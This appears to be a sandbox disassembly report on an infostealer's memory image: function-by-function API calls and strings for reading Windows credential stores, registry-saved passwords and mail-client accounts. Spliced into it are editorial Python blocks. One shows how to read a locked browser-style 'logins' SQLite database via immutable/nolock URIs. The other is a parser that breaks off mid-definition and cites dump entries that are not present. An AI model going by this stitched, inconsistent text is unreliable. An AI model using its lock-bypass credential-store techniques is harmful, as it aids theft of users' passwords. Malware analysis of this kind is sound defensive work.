                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                • sprintf.MSVCRT ref: 004095EB
                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                • memset.MSVCRT ref: 0040961C
                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                • String ID: caption$dialog_%d$menu_%d
                                • API String ID: 3259144588-3822380221
                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                APIs
                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                • API String ID: 2449869053-4258758744
                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                APIs
                                • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                • memset.MSVCRT ref: 0040F84A
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                • String ID: Creds$ps:password
                                • API String ID: 551151806-1872227768
                                • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                APIs
                                • wcsstr.MSVCRT ref: 0040426A
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                • _mbscpy.MSVCRT ref: 004042D5
                                • _mbscpy.MSVCRT ref: 004042E8
                                • strchr.MSVCRT ref: 004042F6
                                • strlen.MSVCRT ref: 0040430A
                                • sprintf.MSVCRT ref: 0040432B
                                • strchr.MSVCRT ref: 0040433C
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                • String ID: %s@gmail.com$www.google.com
                                • API String ID: 3866421160-4070641962
                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                APIs
                                • _mbscpy.MSVCRT ref: 00409749
                                • _mbscpy.MSVCRT ref: 00409759
                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                • _mbscpy.MSVCRT ref: 004097A1
                                • memset.MSVCRT ref: 004097BD
                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                • String ID: TranslatorName$TranslatorURL$general$strings
                                • API String ID: 1035899707-3647959541
                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                APIs
                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                • SetCursor.USER32(00000000), ref: 0040CB35
                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                • SetFocus.USER32(?), ref: 0040CB92
                                • SetFocus.USER32(?), ref: 0040CC0B
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                • String ID:
                                • API String ID: 1416211542-0
                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                • API String ID: 2360744853-2229823034
                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                APIs
                                • strchr.MSVCRT ref: 004100E4
                                • _mbscpy.MSVCRT ref: 004100F2
                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                • _mbscpy.MSVCRT ref: 00410142
                                • _mbscat.MSVCRT ref: 0041014D
                                • memset.MSVCRT ref: 00410129
                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                • memset.MSVCRT ref: 00410171
                                • memcpy.MSVCRT ref: 0041018C
                                • _mbscat.MSVCRT ref: 00410197
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                • String ID: \systemroot
                                • API String ID: 912701516-1821301763
                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$strlen
                                • String ID: -journal$-wal$immutable$nolock
                                • API String ID: 2619041689-3408036318
                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
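The strings -journal, -wal, immutable and nolock in the entry above are SQLite's own journal/WAL sidecar suffixes and URI parameter names, so the dumped image carries an embedded SQLite library (the ATTACH error messages further down come from the same library). The report does not show which files the sample opens or with which parameters. What immutable=1 and nolock=1 do, as an added example written for this page and not code from the sample or from Joe Sandbox: the database, its logins table and its rows are constructed here as a stand-in for a browser credential store, and the column names are an assumption made for the example.

```python
"""SQLite's immutable/nolock URI parameters, as an added example (not code from the
sample or from Joe Sandbox).  The database, its logins table and its rows are
constructed here as a stand-in for a browser credential store; the column names
are an assumption made for this example."""
import os
import sqlite3
import tempfile
from pathlib import Path

def build_sample_db(path):
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://mail.example.test", "alice", b"\x01\x00opaque-blob-1"),  # constructed rows
        ("https://shop.example.test", "bob", b"\x01\x00opaque-blob-2"),
    ])
    con.commit()
    con.close()

def immutable_uri(path):
    # immutable=1: SQLite opens the file read-only, takes no locks and ignores any
    # hot -journal/-wal sidecar.  nolock=1 disables file locking on its own.
    return Path(path).resolve().as_uri() + "?immutable=1&nolock=1"

def read_logins(path, immutable):
    """Rows of (origin_url, username_value).  timeout=0 makes a lock conflict fail
    at once instead of waiting out the busy timeout."""
    if immutable:
        con = sqlite3.connect(immutable_uri(path), uri=True, timeout=0)
    else:
        con = sqlite3.connect(path, timeout=0)
    try:
        return con.execute("SELECT origin_url, username_value FROM logins "
                           "ORDER BY origin_url").fetchall()
    finally:
        con.close()

def hold_exclusive_lock(path):
    """Stand-in for a running browser: after its first write in EXCLUSIVE locking
    mode the connection keeps the EXCLUSIVE lock until it is closed."""
    con = sqlite3.connect(path, isolation_level=None)  # autocommit, so the INSERT commits
    con.execute("PRAGMA locking_mode=EXCLUSIVE")
    con.execute("INSERT INTO logins VALUES ('https://x.example.test', 'carol', X'0100')")
    return con

def read_while_locked(path):
    """(error text from a plain connection, rows from an immutable connection)
    while another connection holds the EXCLUSIVE lock."""
    holder = hold_exclusive_lock(path)
    try:
        plain_error = None
        try:
            read_logins(path, immutable=False)
        except sqlite3.OperationalError as exc:
            plain_error = str(exc)
        # The immutable read bypasses the lock.  Because it also ignores a hot journal,
        # a file that is mid-write can come back torn; copy the database together with
        # its -journal/-wal file (or read a shadow copy) when that matters.
        return plain_error, read_logins(path, immutable=True)
    finally:
        holder.close()

def write_via_immutable(path):
    """Error text when writing through an immutable connection; SQLite refuses it."""
    con = sqlite3.connect(immutable_uri(path), uri=True)
    try:
        con.execute("DELETE FROM logins")
        con.commit()
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)
    finally:
        con.close()

def run_demo():
    """Build the sample database in a temporary directory and collect the results."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "logins.db")
        build_sample_db(path)
        fresh = read_logins(path, immutable=True)
        locked_error, locked_rows = read_while_locked(path)
        return {"fresh": fresh, "locked_error": locked_error,
                "locked_rows": locked_rows, "write_error": write_via_immutable(path)}

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The plain connection fails with "database is locked" while the holder keeps its EXCLUSIVE lock; the immutable connection reads all three committed rows and refuses every write. That is the property a copy-and-parse tool relies on when the owning application keeps the file locked, and it is also why such a read of a file that is being written at that moment is not trustworthy.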
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$strlen
                                • String ID:
                                • API String ID: 4288758904-3916222277
                                • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                APIs
                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                • wcslen.MSVCRT ref: 0040874A
                                • _wcsncoll.MSVCRT ref: 00408794
                                • memset.MSVCRT ref: 0040882A
                                • memcpy.MSVCRT ref: 00408849
                                • wcschr.MSVCRT ref: 0040889F
                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                • String ID: J$Microsoft_WinInet
                                • API String ID: 2203907242-260894208
                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                APIs
                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                • memcpy.MSVCRT ref: 00410961
                                Strings
                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FromStringUuid$memcpy
                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                • API String ID: 2859077140-2022683286
                                • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                APIs
                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                • _mbscpy.MSVCRT ref: 00409686
                                • _mbscpy.MSVCRT ref: 00409696
                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                • API String ID: 888011440-2039793938
                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                APIs
                                Strings
                                • unable to open database: %s, xrefs: 0042EBD6
                                • out of memory, xrefs: 0042EBEF
                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                • too many attached databases - max %d, xrefs: 0042E951
                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                • database %s is already in use, xrefs: 0042E9CE
                                • database is already attached, xrefs: 0042EA97
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                • API String ID: 1297977491-2001300268
                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                APIs
                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                • strchr.MSVCRT ref: 0040327B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileStringstrchr
                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                • API String ID: 1348940319-1729847305
                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                APIs
                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                • memset.MSVCRT ref: 0040FA1E
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                • _strnicmp.MSVCRT ref: 0040FA4F
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                • String ID: WindowsLive:name=*$windowslive:name=
                                • API String ID: 945165440-3589380929
                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
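The entries for the functions whose first call sites are 004045E8 (advapi32 Cred* imports resolved through GetProcAddress), 0040F82C (the Creds / ps:password registry walk), 00443AD2 (Windows Mail and Windows Live Mail keys with the Salt value), 0040874A (Microsoft_WinInet) and 0040FA1E (the WindowsLive:name=* credential filter) all share the same layout, so they can be triaged by script instead of by eye. The parser below is an added example written for this page, not code from Joe Sandbox or from the analysed sample. SAMPLE is constructed from entries shown above; CRED_MARKERS is this editor's choice of substrings drawn from those entries; first_ref() is only an approximate locator, because the plugin prints call sites rather than function starts.

```python
"""Parse 'Joe Sandbox IDA Plugin' function entries and flag credential-store access.
Added example for this page, not code from Joe Sandbox or the sample; SAMPLE is
constructed from entries shown above, bullets and indentation as rendered."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = r"""
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
Strings
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
APIs
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
• strlen.MSVCRT ref: 00443AD2
• ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
Strings
• Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
• Salt, xrefs: 00443BA7
Similarity
• String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
• API String ID: 665470638-2687544566
APIs
• SetBkMode.GDI32(?,00000001), ref: 0040CAA9
• DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
Similarity
• API String ID: 1416211542-0
"""
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Optional "Part of subcall function XXXXXXXX: " prefix, Name.MODULE, optional "(args)",
# then "ref: XXXXXXXX".  Names such as ??2@YAPAXI@Z hold '?' and '@', so the name is
# anything but '.' and whitespace.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^.\s]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int]  # callee address when the call happens inside a subcall

@dataclass
class FunctionEntry:
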